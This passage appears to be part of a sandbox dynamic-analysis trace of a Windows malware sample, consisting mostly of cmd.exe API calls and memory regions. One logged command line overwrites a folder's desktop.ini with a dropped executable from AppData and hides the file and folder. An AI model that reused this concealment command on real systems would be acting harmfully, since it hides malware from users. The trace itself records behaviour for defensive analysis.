(hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.383] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.383] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x32, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x32, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.385] _close (_FileHandle=4) returned 0 [0220.385] FindNextFileW (in: hFindFile=0x310e60, lpFindFileData=0x26ee0c | out: lpFindFileData=0x26ee0c) returned 0 [0220.386] GetLastError () returned 0x12 [0220.386] FindClose (in: hFindFile=0x310e60 | out: hFindFile=0x310e60) returned 1 [0220.386] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0220.387] _close (_FileHandle=3) returned 0 [0220.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.387] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.388] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.388] SetConsoleInputExeNameW () returned 0x1 [0220.388] GetConsoleOutputCP () returned 0x1b5 [0220.388] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.388] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.388] exit (_Code=0) Process: id = "581" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0x6bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32974 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32975 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32976 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32977 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 32978 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32979 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32980 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32981 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32982 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 32983 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33272 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33273 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33274 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33275 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 33276 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 33277 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33278 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33279 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33280 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33281 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33282 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33283 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33284 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33285 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33286 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33287 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33288 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33289 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33290 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33291 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33292 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 33293 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 33294 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 33295 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 33456 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 785 os_tid = 0x610 [0220.929] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af834 | out: lpSystemTimeAsFileTime=0x2af834*(dwLowDateTime=0xb87c1000, dwHighDateTime=0x1d440a9)) [0220.929] GetCurrentProcessId () returned 0x6bc [0220.929] GetCurrentThreadId () returned 0x610 [0220.929] GetTickCount () returned 0x3da47 [0220.930] QueryPerformanceCounter (in: lpPerformanceCount=0x2af82c | out: lpPerformanceCount=0x2af82c*=27771875334) returned 1 [0220.930] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.930] __set_app_type (_Type=0x1) [0220.930] __p__fmode () returned 0x76b331f4 [0220.931] __p__commode () returned 0x76b331fc [0220.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.931] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.931] GetCurrentThreadId () returned 0x610 [0220.931] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x610) returned 0x38 [0220.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.931] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.931] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7c4 | out: phkResult=0x2af7c4*=0x0) returned 0x2 [0220.932] VirtualQuery (in: lpAddress=0x2af7fb, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] GetConsoleOutputCP () returned 0x1b5 [0220.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.932] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.933] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.933] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.933] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.933] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.933] GetEnvironmentStringsW () returned 0x330458* [0220.933] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.933] GetEnvironmentStringsW () returned 0x330458* [0220.934] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.934] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae734 | out: phkResult=0x2ae734*=0x40) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x8, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x0, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegCloseKey (hKey=0x40) returned 0x0 [0220.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae734 | out: phkResult=0x2ae734*=0x40) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x0, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegCloseKey (hKey=0x40) returned 0x0 [0220.934] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.935] srand (_Seed=0x5b8863b6) [0220.935] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" [0220.935] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" [0220.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.935] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.935] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.935] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.936] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.936] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.936] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.936] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.936] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.936] GetEnvironmentStringsW () returned 0x3325a8* [0220.936] FreeEnvironmentStringsW (penv=0x3325a8) returned 1 [0220.936] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.936] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.936] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.936] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.936] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.936] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.936] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.936] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.936] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.936] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.936] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af500 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.936] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af500, lpFilePart=0x2af4fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af4fc*="Desktop") returned 0x18 [0220.936] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 